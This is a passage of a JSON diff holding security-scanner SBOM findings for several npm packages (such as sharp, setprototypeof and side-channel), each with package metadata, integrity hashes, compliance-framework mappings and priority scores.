or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "aaaf7e5ff977361c", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: set-blocking 2.0.0", + "title": "set-blocking 2.0.0", + "description": "Package discovered: set-blocking 2.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "afe02a75a981b13d", + "name": "set-blocking", + "version": "2.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:set-blocking:set-blocking:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:set-blocking:set_blocking:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:set_blocking:set-blocking:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:set_blocking:set_blocking:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:set:set-blocking:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:set:set_blocking:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/set-blocking@2.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", + "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "506518f9c8ac4766", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: setprototypeof 1.2.0", + "title": "setprototypeof 1.2.0", + "description": "Package discovered: setprototypeof 1.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "fc983ad918ad063a", + "name": "setprototypeof", + "version": "1.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:setprototypeof:setprototypeof:1.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/setprototypeof@1.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/setprototypeof/-/setprototypeof-1.2.0.tgz", + "integrity": "sha512-E5LDX7Wrp85Kil5bhZv46j8jOeboKq5JMmYM3gVGdGH8xFpPWXUMsNrlODCrkoxMEeNi/XZIwuRvY4XNwYMJpw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "fdeea92c74bf39fa", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: sharp 0.34.5", + "title": "sharp 0.34.5", + "description": "Package discovered: sharp 0.34.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f96d5af8de184f83", + "name": "sharp", + "version": "0.34.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:sharp_project:sharp:0.34.5:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/sharp@0.34.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/sharp/-/sharp-0.34.5.tgz", + "integrity": "sha512-Ou9I5Ft9WNcCbXrU9cMgPBcCK8LiwLqcbywW3t4oDV37n1pzpuNLsYiAV8eODnjbtQlSDwZ2cUEeQz4E54Hltg==", + "dependencies": { + "@img/colour": "^1.0.0", + "detect-libc": "^2.1.2", + "semver": "^7.7.3" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a0d820679cbb3cb7", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: shebang-command 2.0.0", + "title": "shebang-command 2.0.0", + "description": "Package discovered: shebang-command 2.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "14d8b5cbe6162ddd", + "name": "shebang-command", + "version": "2.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:shebang-command:shebang-command:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:shebang-command:shebang_command:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:shebang_command:shebang-command:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:shebang_command:shebang_command:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:shebang:shebang-command:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:shebang:shebang_command:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/shebang-command@2.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", + "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", + "dependencies": { + "shebang-regex": "^3.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f5b7b8efb70e19a9", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: shebang-regex 3.0.0", + "title": "shebang-regex 3.0.0", + "description": "Package discovered: shebang-regex 3.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "b86e26fe1fc6c7c9", + "name": "shebang-regex", + "version": "3.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:shebang-regex:shebang-regex:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:shebang-regex:shebang_regex:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:shebang_regex:shebang-regex:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:shebang_regex:shebang_regex:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:shebang:shebang-regex:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:shebang:shebang_regex:3.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/shebang-regex@3.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", + "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "6b555e361c3642d5", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: side-channel 1.1.0", + "title": "side-channel 1.1.0", + "description": "Package discovered: side-channel 1.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "a236188908f1e843", + "name": "side-channel", + "version": "1.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:side-channel:side-channel:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side-channel:side_channel:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side_channel:side-channel:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side_channel:side_channel:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side:side-channel:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side:side_channel:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/side-channel@1.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/side-channel/-/side-channel-1.1.0.tgz", + "integrity": "sha512-ZX99e6tRweoUXqR+VBrslhda51Nh5MTQwou5tnUDgbtyM0dBgmhEDtWGP/xbKn6hqfPRHujUNwz5fy/wbbhnpw==", + "dependencies": { + "es-errors": "^1.3.0", + "object-inspect": "^1.13.3", + "side-channel-list": "^1.0.0", + "side-channel-map": "^1.0.1", + "side-channel-weakmap": "^1.0.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "890b23d99b8d3706", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: side-channel-list 1.0.1", + "title": "side-channel-list 1.0.1", + "description": "Package discovered: side-channel-list 1.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "2e4a230ff21329f1", + "name": "side-channel-list", + "version": "1.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:side-channel-list:side-channel-list:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side-channel-list:side_channel_list:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side_channel_list:side-channel-list:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side_channel_list:side_channel_list:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side-channel:side-channel-list:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side-channel:side_channel_list:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side_channel:side-channel-list:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side_channel:side_channel_list:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side:side-channel-list:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side:side_channel_list:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/side-channel-list@1.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/side-channel-list/-/side-channel-list-1.0.1.tgz", + "integrity": "sha512-mjn/0bi/oUURjc5Xl7IaWi/OJJJumuoJFQJfDDyO46+hBWsfaVM65TBHq2eoZBhzl9EchxOijpkbRC8SVBQU0w==", + "dependencies": { + "es-errors": "^1.3.0", + "object-inspect": "^1.13.4" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "6043652240bb3202", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: side-channel-map 1.0.1", + "title": "side-channel-map 1.0.1", + "description": "Package discovered: side-channel-map 1.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "36c9d18daa63eabd", + "name": "side-channel-map", + "version": "1.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:side-channel-map:side-channel-map:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side-channel-map:side_channel_map:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side_channel_map:side-channel-map:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side_channel_map:side_channel_map:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side-channel:side-channel-map:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side-channel:side_channel_map:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side_channel:side-channel-map:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side_channel:side_channel_map:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side:side-channel-map:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side:side_channel_map:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/side-channel-map@1.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/side-channel-map/-/side-channel-map-1.0.1.tgz", + "integrity": "sha512-VCjCNfgMsby3tTdo02nbjtM/ewra6jPHmpThenkTYh8pG9ucZ/1P8So4u4FGBek/BjpOVsDCMoLA/iuBKIFXRA==", + "dependencies": { + "call-bound": "^1.0.2", + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.5", + 